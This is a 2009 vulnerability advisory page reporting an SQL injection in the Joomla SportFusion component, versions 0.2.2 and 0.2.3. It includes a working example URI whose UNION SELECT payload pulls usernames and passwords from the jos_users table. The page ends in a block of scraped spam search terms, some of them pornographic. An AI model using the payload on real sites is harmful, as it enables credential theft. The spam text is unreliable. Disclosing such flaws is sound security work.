about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla! SportFusion Component SQL Injection Vulnerability


Title Joomla! SportFusion Component SQL Injection Vulnerability
Published 2009-09-22-12:00AM
Updated 2009-09-23-04:10PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  kaMtiEz
Vulnerable  Kinfusion SportFusion 0.2.3
Kinfusion SportFusion 0.2.2
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available: http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users--
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 25 Nov 2009 03:52:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.bthyby Crack+Data web patio www.haoed3 www.quangu xxyxx.ling www.bthdbx www.luoheb news for C telugu sex Www.fd5.co www.hbxk.n van www.sexs.c porn photo FREE sex w foto artis Www.fd5.co www.changs laserje injection www.ltfyz. webrunner. Asin ms06-040 components for www.ho www.office www.btclpu jshuwei.or CMS is Fre g6ftpserve /search/ex wwwoorkut. Saxvideor www.bjbwjc y08.org Wap.Sexyvi Www.indian www.btclzl security/i iipaqigaqe www.ka69.c www.hgjxjg xpl/exploi INDIANISEX 2.6.16 loc Indian Mas www.hycyjg total vide